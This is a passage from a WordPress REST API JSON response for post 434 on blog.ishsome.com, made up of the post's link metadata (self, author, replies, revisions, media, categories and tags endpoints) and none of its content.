2x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/434","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=434"}],"version-history":[{"count":2,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/434\/revisions"}],"predecessor-version":[{"id":436,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/434\/revisions\/436"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=434"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=434"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=434"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}